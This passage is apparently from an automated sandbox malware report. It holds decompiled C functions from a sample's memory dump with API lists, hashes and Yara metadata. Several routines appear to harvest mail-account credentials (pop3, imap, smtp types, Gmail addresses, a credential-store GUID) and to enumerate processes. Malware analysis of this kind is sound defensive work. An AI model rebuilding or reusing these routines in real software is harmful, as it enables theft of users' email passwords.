				E004060DA(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060DA(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L00412072();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L00412072();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L00412072();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E004023C6( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                                                                                                                        0x004044e4
                                                                                                                                                                        0x004044f0
                                                                                                                                                                        0x004044f8
                                                                                                                                                                        0x004044fb
                                                                                                                                                                        0x00404506
                                                                                                                                                                        0x00404509
                                                                                                                                                                        0x00404515
                                                                                                                                                                        0x00404518
                                                                                                                                                                        0x0040451f
                                                                                                                                                                        0x00404531
                                                                                                                                                                        0x00404540
                                                                                                                                                                        0x00404552
                                                                                                                                                                        0x00404564
                                                                                                                                                                        0x00404569
                                                                                                                                                                        0x0040456f
                                                                                                                                                                        0x00404574
                                                                                                                                                                        0x00404575
                                                                                                                                                                        0x0040457f
                                                                                                                                                                        0x0040458d
                                                                                                                                                                        0x00404592
                                                                                                                                                                        0x00404593
                                                                                                                                                                        0x0040459c
                                                                                                                                                                        0x004045aa
                                                                                                                                                                        0x004045af
                                                                                                                                                                        0x004045b0
                                                                                                                                                                        0x004045b9
                                                                                                                                                                        0x004045bb
                                                                                                                                                                        0x004045bb
                                                                                                                                                                        0x0040459e
                                                                                                                                                                        0x0040459e
                                                                                                                                                                        0x0040459e
                                                                                                                                                                        0x00404581
                                                                                                                                                                        0x00404581
                                                                                                                                                                        0x00404581
                                                                                                                                                                        0x004045cb
                                                                                                                                                                        0x004045d4
                                                                                                                                                                        0x004045ef

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
                                                                                                                                                                        • _stricmp.MSVCRT(?,imap), ref: 00404593
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp$memcpystrlen
                                                                                                                                                                        • String ID: imap$pop3$smtp
                                                                                                                                                                        • API String ID: 445763297-821077329
                                                                                                                                                                        • Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                        • Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
                                                                                                                                                                        • Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                        • Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004036A6 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004036A6(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040EF77(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E00402197( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E004023C6( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                                                                                                                        0x004036a6
                                                                                                                                                                        0x004036a6
                                                                                                                                                                        0x004036b6
                                                                                                                                                                        0x00403788
                                                                                                                                                                        0x00403788
                                                                                                                                                                        0x004036c7
                                                                                                                                                                        0x004036ca
                                                                                                                                                                        0x004036d1
                                                                                                                                                                        0x004036dc
                                                                                                                                                                        0x004036e0
                                                                                                                                                                        0x004036e5
                                                                                                                                                                        0x004036eb
                                                                                                                                                                        0x004036f8
                                                                                                                                                                        0x004036fb
                                                                                                                                                                        0x00403709
                                                                                                                                                                        0x00403719
                                                                                                                                                                        0x00403725
                                                                                                                                                                        0x0040372f
                                                                                                                                                                        0x00403748
                                                                                                                                                                        0x0040375d
                                                                                                                                                                        0x00403762
                                                                                                                                                                        0x00403773
                                                                                                                                                                        0x00403781
                                                                                                                                                                        0x00403781
                                                                                                                                                                        0x004036eb
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                          • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                          • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                          • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                        • strchr.MSVCRT ref: 004036E0
                                                                                                                                                                        • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                                                                                                                                                                        • strlen.MSVCRT ref: 00403739
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040375D
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00403773
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                        • String ID: %s@gmail.com
                                                                                                                                                                        • API String ID: 2649369358-4097000612
                                                                                                                                                                        • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                        • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                                                                                                                                                                        • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040687C Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040687C(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                                                                                                                        0x0040687c
                                                                                                                                                                        0x0040688b
                                                                                                                                                                        0x00406895
                                                                                                                                                                        0x0040689c
                                                                                                                                                                        0x004068a1
                                                                                                                                                                        0x004068a4
                                                                                                                                                                        0x004068a9
                                                                                                                                                                        0x004068ac
                                                                                                                                                                        0x004068b2
                                                                                                                                                                        0x004068b5
                                                                                                                                                                        0x004068b8
                                                                                                                                                                        0x004068c9
                                                                                                                                                                        0x004068d5
                                                                                                                                                                        0x004068da
                                                                                                                                                                        0x004068ea
                                                                                                                                                                        0x004068f4
                                                                                                                                                                        0x004068f8
                                                                                                                                                                        0x004068fd
                                                                                                                                                                        0x00406908
                                                                                                                                                                        0x00406910
                                                                                                                                                                        0x00406913
                                                                                                                                                                        0x00406916
                                                                                                                                                                        0x00406916
                                                                                                                                                                        0x00406919
                                                                                                                                                                        0x00406919
                                                                                                                                                                        0x0040691f
                                                                                                                                                                        0x00406920
                                                                                                                                                                        0x00406923
                                                                                                                                                                        0x00406926
                                                                                                                                                                        0x0040692e

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                        • String ID: %s (%s)
                                                                                                                                                                        • API String ID: 3756086014-1363028141
                                                                                                                                                                        • Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                        • Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
                                                                                                                                                                        • Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EF77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                        			E0040EF77(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040EF3B( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                                                                                                                        0x0040ef77
                                                                                                                                                                        0x0040ef7e
                                                                                                                                                                        0x0040ef8e
                                                                                                                                                                        0x0040ef9b
                                                                                                                                                                        0x0040ef9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040efc7
                                                                                                                                                                        0x0040efc7
                                                                                                                                                                        0x0040efcd
                                                                                                                                                                        0x0040efd1
                                                                                                                                                                        0x0040efd1
                                                                                                                                                                        0x0040efd7
                                                                                                                                                                        0x0040efe2
                                                                                                                                                                        0x0040efe6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040efee

                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                        Strings
                                                                                                                                                                        • 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
                                                                                                                                                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                        • API String ID: 1640410171-3316789007
                                                                                                                                                                        • Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                        • Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
                                                                                                                                                                        • Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                        • Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409F9C Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00409F9C(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                                        0x00409fa2

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                                                                                                                                                                          • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                        • LoadIconA.USER32(000000CE), ref: 00409FE7
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                        • LoadIconA.USER32(000000CF), ref: 0040A005
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3673709545-0
                                                                                                                                                                        • Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                        • Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
                                                                                                                                                                        • Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                        • Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409F9D Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00409F9D(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                                        0x00409fa2

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A175: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A190
                                                                                                                                                                          • Part of subcall function 0040A175: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A1AA
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                        • LoadIconA.USER32(000000CE), ref: 00409FE7
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                        • LoadIconA.USER32(000000CF), ref: 0040A005
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 0040A025
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3673709545-0
                                                                                                                                                                        • Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                        • Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
                                                                                                                                                                        • Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                        • Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407E74 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E00407E74(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E00412360(0x1004, _t17);
				_t21 =  *0x4181b8;
				if( *0x4181b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4182c0, "dialog_%d",  *0x418300);
					if(E00407F4F(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407E17, 0);
				}
				return _t8;
			}







                                                                                                                                                                        0x00407e7c
                                                                                                                                                                        0x00407e81
                                                                                                                                                                        0x00407e88
                                                                                                                                                                        0x00407e98
                                                                                                                                                                        0x00407e9f
                                                                                                                                                                        0x00407eb4
                                                                                                                                                                        0x00407ecf
                                                                                                                                                                        0x00407edb
                                                                                                                                                                        0x00407edb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407eeb
                                                                                                                                                                        0x00407ef2

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00407E9F
                                                                                                                                                                        • sprintf.MSVCRT ref: 00407EB4
                                                                                                                                                                          • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                                                                                                                                                                          • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                                                                                                                                                                          • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                                                                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00407EDB
                                                                                                                                                                        • EnumChildWindows.USER32 ref: 00407EEB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                                                                                                        • String ID: caption$dialog_%d
                                                                                                                                                                        • API String ID: 246480800-4161923789
                                                                                                                                                                        • Opcode ID: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                        • Instruction ID: c346797357670b32f643cbd36cfbc212eb539bb93902627947de0ac2d0f12ab5
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e550837f943315e237d33f8ccb0dbabbd4e98402079b2b4a2b47b3f427e8a7f
                                                                                                                                                                        • Instruction Fuzzy Hash: DBF0BB3058424D7EDB129750DD06FD97A68AB18746F0400EAFB44E10D1DBF8AAD0875E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E8C6 Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                        			E0040E8C6(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E00412360(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E004062A6() == 0 ||  *0x418518 == 0) {
					if( *0x418514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x417fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x417fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040EAD0(_a8,  &_v316) != 0) {
									_t64 =  *0x417fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x417fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x417fdc(_v8, _t84,  &_v580, 0x104);
									E0040E7E3( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x417fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040EAD0(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                                                                                                                        0x0040e8ce
                                                                                                                                                                        0x0040e8d6
                                                                                                                                                                        0x0040e8d8
                                                                                                                                                                        0x0040e8e2
                                                                                                                                                                        0x0040ea06
                                                                                                                                                                        0x0040ea0c
                                                                                                                                                                        0x0040ea12
                                                                                                                                                                        0x0040ea1b
                                                                                                                                                                        0x0040ea1e
                                                                                                                                                                        0x0040ea31
                                                                                                                                                                        0x0040ea38
                                                                                                                                                                        0x0040ea3e
                                                                                                                                                                        0x0040eabb
                                                                                                                                                                        0x0040ea53
                                                                                                                                                                        0x0040ea5e
                                                                                                                                                                        0x0040ea72
                                                                                                                                                                        0x0040ea78
                                                                                                                                                                        0x0040ea83
                                                                                                                                                                        0x0040ea8c
                                                                                                                                                                        0x0040ea8f
                                                                                                                                                                        0x0040ea9c
                                                                                                                                                                        0x0040eaa9
                                                                                                                                                                        0x0040eab5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eab5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eaa9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eabb
                                                                                                                                                                        0x0040ea1e
                                                                                                                                                                        0x0040e8f4
                                                                                                                                                                        0x0040e8fd
                                                                                                                                                                        0x0040e905
                                                                                                                                                                        0x0040e908
                                                                                                                                                                        0x0040e911
                                                                                                                                                                        0x0040e912
                                                                                                                                                                        0x0040e91d
                                                                                                                                                                        0x0040e91e
                                                                                                                                                                        0x0040e927
                                                                                                                                                                        0x0040e92d
                                                                                                                                                                        0x0040e92d
                                                                                                                                                                        0x0040e931
                                                                                                                                                                        0x0040e938
                                                                                                                                                                        0x0040e93b
                                                                                                                                                                        0x0040e94a
                                                                                                                                                                        0x0040e953
                                                                                                                                                                        0x0040e95a
                                                                                                                                                                        0x0040e96c
                                                                                                                                                                        0x0040e977
                                                                                                                                                                        0x0040e97e
                                                                                                                                                                        0x0040e982
                                                                                                                                                                        0x0040e993
                                                                                                                                                                        0x0040e999
                                                                                                                                                                        0x0040e9ab
                                                                                                                                                                        0x0040e9b0
                                                                                                                                                                        0x0040e9b5
                                                                                                                                                                        0x0040e9b6
                                                                                                                                                                        0x0040e9bc
                                                                                                                                                                        0x0040e9c7
                                                                                                                                                                        0x0040e9cc
                                                                                                                                                                        0x0040e9d2
                                                                                                                                                                        0x0040e9d2
                                                                                                                                                                        0x0040e9e6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9ec
                                                                                                                                                                        0x0040e9f5
                                                                                                                                                                        0x0040e948
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9fb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e9f5
                                                                                                                                                                        0x0040e94a
                                                                                                                                                                        0x0040e93b
                                                                                                                                                                        0x0040eabf
                                                                                                                                                                        0x0040eac2
                                                                                                                                                                        0x0040eac2
                                                                                                                                                                        0x0040e908
                                                                                                                                                                        0x0040eacf

